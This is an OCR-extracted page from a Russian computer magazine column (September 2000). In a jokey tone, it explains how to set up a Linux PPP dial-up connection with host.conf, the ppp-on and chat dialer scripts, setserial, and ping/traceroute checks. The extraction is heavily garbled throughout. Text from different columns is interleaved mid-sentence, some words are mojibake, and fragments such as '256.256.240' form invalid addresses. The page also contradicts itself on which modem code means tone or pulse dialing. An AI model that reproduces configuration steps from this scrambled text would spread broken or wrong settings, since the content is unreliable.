|
|
|
||||||||
|
|
Пока держится связь, |
212.192.100.66 |
biobase.tsu.tomsk.su |
|
|
|
|
|
||||||
|
|
Маздай |
готов |
çàíè- |
|
|
|
|
|
|
|
|
|
|
|
|
|
маться чем угодно, но |
в моем случае. Между IP серверов и соответствую- |
|
|
|
|
|
|||||||
|
|
только не сосать байты |
щим им именем можно запихать любой разделитель- |
|
|
|
|
|
|||||||
|
|
из Internet! А всякая оп- |
ный символ: пробел или табуляцию. |
|
|
|
|
|
|||||||
|
|
тимизация |
|
напоминает |
Порядок отправки запросов на расшифровку имени |
|
|
|
|
|
|||||
|
|
говоры “Дай! |
Íó, |
äàé!”... |
сервера устанавливается в файле /etc/host.conf, кото- |
|
|
|
|
|
|||||
|
|
|
|
|
|
рый должен содержать строки |
|
|
|
|
|
||||
|
|
не скажешь про Linux. |
|
|
|
|
|
|
|
|
|
|
|||
|
|
взялся за работу и устано- |
order hosts, bind |
|
|
|
|
|
|
|
|
||||
|
|
будь уверен, грузить бу- |
multi on |
|
|
|
|
|
|
|
|
|
|||
|
|
без передыху и всех |
|
|
|
|
|
|
|
|
|
|
|||
|
|
бережешь свое время, а |
Если же вы перепишите |
|
|
|
|
|
|
|
|||||
|
|
а значит - время), то на- |
|
|
|
|
|
|
|
|
|
|
|||
|
|
под Linux прямо сейчас. |
order bind, hosts |
|
|
|
|
|
|
|
|
||||
|
|
настроек, следует убедить- |
|
|
|
|
|
|
|
|
|
|
|||
|
|
необходимое. Я имею |
то получится полный облом, и содержимое вашего |
|
|
|
|
|
|||||||
|
|
|
|
|
|
etc/hosts учитываться практически не будет. |
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|
|||||
|
|
|
|
|
|
Имя домена должно занять свое место в файле |
|
|
|
|
|
||||
|
|
|
|
|
|
etc/ppp/options. При этом его содержимое станет по- |
|
|
|
|
|
||||
|
|
|
|
|
|
хожим на нечто такое |
|
|
|
|
|
|
|
|
|
|
|
192.100.77 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
192.100.1 |
|
|
|
lock |
|
|
|
|
|
|
|
|
|
|
|
256.256.240 |
|
|
domain |
tsu.ru |
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
> СЕНТЯБРЬ ‘ Y2K |
|
|
31337/ЮНИКСОИД |
|
0039 |
|
57 |
|
|||||||||
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||
|
|
|
|
|
|
|
|||||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Кроме этого, домен может найти и еще одно приме- |
# |
|
|
|
|
|
|
|
|
|
|
|
|
|
|||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||
|
|
|
|
|
|
|
|
нение. Если тебе удастся таки выскочить в Internet, то |
|
exec chat -v \ |
|
|
|
|
|
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
можно сразу заявить о себе именем vasia.tsu.ru и ор- |
|
TIMEOUT |
3 \ |
|
|
|
|
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||
|
|
|
|
|
|
|
|
ганизовать временные finger, ftp и даже www сервера. |
|
ABORT |
‘\nBUSY\r’\ |
|
|
|
|
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||
|
|
|
|
|
|
|
|
Для этого в файле инициализационных настроек ма- |
|
ABORT |
‘\nNO ANSWER\r’ \ |
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||
|
|
|
|
|
|
|
|
шины (/etc/rc.d/rc.local - например) следует пропи- |
|
ABORT |
|
|
|
|
|
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
сать строку типа |
|
‘\nRINGING\r\n\r\nRINGING\r’ \ |
|
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
‘’ \rAT\ |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
/bin/hostname vasia.tsu.ru |
|
‘OK-+++\c-OK’ |
ATH0\ |
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|
|
TIMEOUT |
30\ |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Конечно, твой личный сервер нельзя |
использовать |
|
OK |
ATDP$TELEPHONE\ |
|
|
|
|
|
|
|
|
|
|
|||
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||
|
|
|
|
|
|
|
|
для организации баннерной сети обмена |
или мощно- |
|
CONNECT |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
го сетевого портала со 100 000 посетителей |
â ìèíó- |
1000 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||
|
|
|
|
|
|
|
|
ту, но все же может пригодиться!.. |
|
|
‘’\ |
|
|
|
Код ATD переключает модем в режим тонального на- |
|
|
||||||||
|
|
|
|
|
|
|
|
Обратим взоры на твой основной орган для установ- |
|
name:—name: $ACCOUNT\ |
|
бора номеров. |
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||
|
|
|
|
|
|
|
|
ления различных связей, то есть модем. Надеюсь, ты |
|
password: |
$PASSWORD |
Хо-хо-хо! Как говориться, наступает полный абзац. |
|
|
|||||||||||
|
|
|
|
|
|||||||||||||||||||||
|
|
|
|
|
|
|
|
купил стабильный девайс от ништячных производите- |
|
|
|
|
|
Нервных и беременных просим удалиться. %) Мы |
|
|
|||||||||
|
|
|
|
|
|
|
|
лей. Потому что если у тебя какой-нибудь там зюхел, |
|
При первом просмотре можно заметить, что, по всей |
приступаем к конфигурированию самого важного и |
|
|
||||||||||||
|
|
|
|
|
|
|
|
|
|
||||||||||||||||
|
|
|
|
|
|
|
|
собранный на комплектующих от акорпа с последую- |
|
видимости, кто-то с кем-то ведет чат. Так оно и есть! |
главного скрипта, предназначенного непосредствен- |
|
|
|
|||||||||||
|
|
|
|
|
|
|
|
щим апгрейтом от роботикса, то я умываю руки... Хо- |
|
Это Linux пытается завязать разговор с модемом и |
но для установки и полной инициализации связи с |
|
|
||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||
|
|
|
|
|
|
|
|
тя, в принципе, это не важно. Главное, чтобы у тебя |
|
уговорить его набрать требуемый номер. Судя по ко- |
Internet через провайдера. Расположен он в |
||||||||||||||
|
|
|
|
|
|
|
|
||||||||||||||||||
|
|
|
|
|
|
|
|
была голова на плечах, а не в другом месте. Для са- |
|
личеству “абортов”, сделать это не так уж и легко... |
/usr/sbin/ppp-on. Наберите полную грудь воздуха и |
||||||||||||||
|
|
|
|
|
|
|
|
мых что ни на есть распространенных модемов, рабо- |
|
%) |
|
|
|
открывайте: |
|
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
тающих по AT стандартам, можно использовать |
|
Единственный параметр, который интересует нас в |
|
|
|
|
|
|
|
|
|
|
|||||
|
|
|
|
|
|
|
|
скрипт /etc/ppp-on-dialer в следующем виде: |
|
этом скрипте, это код ATDP, который означает пере- |
#!/bin/sh |
|
|
|
|
|
|
|
|
|
|||||
|
|
|
|
|
|
|
|
|
|
|
|
ход на пульсовой набор номера. Если твоя АТС допус- |
# |
|
|
|
|
|
|
|
|
|
|||
|
|
|
|
|
|
|
|
#!/bin/sh |
|
кает использование тонального набора, то я настоя- |
# ppp-on |
|
|
|
|
|
|
|
|
|
|||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||
|
|
|
|
|
# |
|
|
|
тельно рекомендую тебе прямо сейчас ломануться к |
# |
|
|
|
|
|
|
|
|
|
||||||
|
|
|
|
|
|
|
|
# /etc/ppp-on-dialer |
|
ним и договориться о переключении с пульсового на |
# Основные параметры настройки |
|
|
|
|
|
|
|
|||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
|
|
|
# Выполняет всю черную работу по установке соеди- |
|
более быстрый тональный набор. Это сбережет вре- |
TELEPHONE=410458 |
# Телефонный номер гейта |
|
|
|
|
|||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||
|
|
|
|
|
|
|
|
нения |
|
мя, а значит - деньги (или деньги, а значит - время). |
ACCOUNT=vasia |
# Регистрационное имя |
|
|
|
|
|||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
58 |
003A |
31337/ЮНИКСОИД |
|
|
|
|
> СЕНТЯБРЬ ‘ Y2K |
|||||
|
|
|
|
|
|||||||||
|
|
|
|||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
PASSWORD=12345 |
|
# Пароль |
Сейчас ты уже полностью укомплектован и на 100% |
жутко рисковали и просто-напросто заслужили его! |
|
|
|
|
|
|
||||||||||
|
|
LOCAL_IP=212.192.100.77 # Локальный IP |
готов “иметь” Internet по полной программе. Но... |
Итак, печатаем |
|
|
|
|
|
|
|
|
|
|
|
|||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
|
|
REMOTE_IP=0.0.0.0 |
# Удаленный IP |
кажется, мы что-то забыли! Ну конечно, следует так- |
|
|
|
|
|
|
|
|
|
|
|
|
||||||
|
|
NETMASK=255.255.255.240 # Маска подсети |
же подготовить скрипт для “цивильного” заверше- |
traceroute www.tsu.ru |
|
|
|
|
|
|
||||||||||||
|
|
# |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
ния связи с провайдером и выгрузки демона pppd из |
и под выскакивающие на экран имена серверов с |
|
|
|
|
|
|
|||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||
|
|
export TELEPHONE ACCOUNT PASSWORD |
памяти компа. Хотя, в принципе, можно пользовать- |
|
|
|
|
|
|
|||||||||||||
|
|
# Укажите полное имя программы набора номера |
ся и кнопкой “Reset”... К великому счастью, ppp-off |
временами ответов, хлопки пробок и шипенье пу- |
|
|
|
|
|
|
||||||||||||
|
|
DIALER_SCRIPT=/etc/ppp/ppp-on-dialer |
править не нужно. Если установка связи требует нас- |
зырьков поздравляем друг друга с успешным прео- |
|
|
|
|
|
|
||||||||||||
|
|
|
|
|
|
|
|
|||||||||||||||
|
|
#Типичный запуск демона pppd после соединения с |
тройки разных скриптов, то разорвать связь с кем |
долением “чекпоинта”, о котором я толковал в са- |
|
|
|
|
|
|
||||||||||||
|
|
|
|
|
|
|
|
|||||||||||||||
|
|
# помощью ppp-on-dialer |
угодно Linux способен самостоятельно. |
мом начале статьи. |
|
|
|
|
|
|
||||||||||||
|
|
# |
|
|
|
|
|
Надеюсь, ты уже чувствуешь |
|
|
|
|
|
|
|
|
||||||
|
|
exec /usr/sbin/pppd debug lock modem crtscts |
|
|
|
|
|
|
|
|
||||||||||||
|
|
/dev/ttyS2 38400 \ |
|
|
|
неоспоримое преимущество |
|
|
|
|
|
|
|
|
|
|
||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||
|
|
asyncmap 20A0000 escape FF kdebug 0 |
Linux перед |
Вынью. Еще бы! |
|
|
|
|
|
|
|
|
||||||||||
|
|
$LOCAL_IP:$REMOTE_IP \ |
|
|
|
|
|
|
|
|
||||||||||||
|
|
noipdefault netmask $NETMASK defaultroute connect |
И скорость |
связи раза |
|
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
|
|
|
|
|
|||||||||||||
|
|
$DIALER_SCRIPT |
|
|
|
в 1.5-2 стала |
больше, и комп |
|
|
|
|
|
|
|
|
|||||||
|
|
Хм... Оказалось, все не так уж сложно. Вон телефон- |
не глючит и |
не виснет. |
|
|
|
|
|
|
|
|
|
|
||||||||
|
|
ный номер указывается, логин и пассворд, затем ос- |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||
|
|
тальные сетевые |
параметры. Если провайдер выде- |
Набрав команду “ppp-on” и установив |
связь с про- |
Надеюсь, ты уже чувствуешь неоспоримое преиму |
|
- |
|
|
|
|
|
|
||||||||
|
|
ляет хостам динамический IP, то следует прописать |
|
|
|
|
|
|
|
|||||||||||||
|
|
|
|
|
|
|
|
|
||||||||||||||
|
|
LOCAL_IP=0.0.0.0 |
|
|
|
вайдером, следует убедиться, что мы |
получили таки |
щество Linux перед Вынью. Еще бы! И скорость свя- |
|
|
|
|
|
|
||||||||
|
|
|
|
|
|
|
|
|
|
|
||||||||||||
|
|
|
|
|
|
|
|
доступ к ресурсам Internet. Для этого |
не следует |
зи раза в 1.5-2 стала больше, и комп не глючит и не |
|
|
|
|
|
|
||||||
|
|
Загрузив все переменные окружения, скрипт стар- |
сразу грузить Нет-Шкаф - берите ниже! |
Начнем с |
виснет. Кстати сказать, в последнее время начало |
|
|
|
|
|
|
|||||||||||
|
|
тует демона pppd. Полное описание всех ключей его |
ping 212.192.100.1 |
|
появляться очень большое количество статей и книг, |
|
|
|
|
|
|
|||||||||||
|
|
|
|
|
|
|
|
|
||||||||||||||
|
|
запуска можно посмотреть в справочнике. Сейчас |
|
|
|
посвященных Linux. Большинство из них совершен- |
|
|
|
|
|
|
||||||||||
|
|
же следует обратить внимание на параметры |
Если пакеты не вернулись, то следует |
проверить все |
но бесплатно можно скачать из Internet. Все больше |
|
|
|
|
|
|
|||||||||||
|
|
/dev/ttyS2 38400, под которыми подразумевается, |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||
|
|
скрипты с самого начала. Ошибка может |
áûòü â ëþ- |
и больше российского народу склоняется на сторону |
|
|
|
|
|
|
||||||||||||
|
|
что у тебя на втором последовательном порту |
бом из них, кроме, конечно, /etc/resolv.cfg |
и других |
Линукс, его начали ставить даже в компьютерных |
|
|
|
|
|
|
|||||||||||
|
|
|
|
|
|
|
|
|||||||||||||||
|
|
(COM2) висит модем с пропускной способностью |
связанных с ним файлов. |
|
классах! |
|
|
|
|
|
|
|
|
|
|
|
||||||
|
|
38400 бод (33600 бод). Проверь, прописан ли модем |
После попробуй круче |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||
|
|
в dev? Если нет, то следует добавить в один из ини- |
|
|
|
Ответы на нерассмотренные в этой статье вопросы, |
|
|
|
|
|
|
||||||||||
|
|
циализационных файлов (типа rc.local или rc.serial) |
ping www.tsu.ru |
|
такие как: автоматический повтор набора номера, |
|
|
|
|
|
|
|||||||||||
|
|
|
|
|
|
|
|
|
||||||||||||||
|
|
строку |
|
|
|
|
|
|
|
набор списка номеров, оптимизация связи и др., |
|
|
|
|
|
|
||||||
|
|
/bin/setserial -b /dev/ttyS2 |
В случае “тайм аута” ошибку, наоборот, |
следует ис- |
уже можно найти на многих российских серверах, |
|
|
|
|
|
|
|||||||||||
|
|
èëè |
|
|
|
|
|
кать как раз в файлах /etc/resolv.cfg и т.п. |
посвященных Linux (начни с www.linux.ru). И не за- |
|
|
|
|
|
|
|||||||
|
|
/bin/setserial -b /dev/ttyS2 IRQ 11 |
И уже, ваще, коронная команда, после которой сле- |
будь... купить футболку с надписью “Linux Rulezzz!” - |
|
|
|
|
|
|
||||||||||||
|
|
если используется специальное прерывание. |
дует бежать за шампанским, т.к. все эти полчаса мы |
теперь ты точно знаешь, что это истинная правда! |
|
|
|
|
|
|
||||||||||||
|
|
|
|
|
|
|
|
|||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|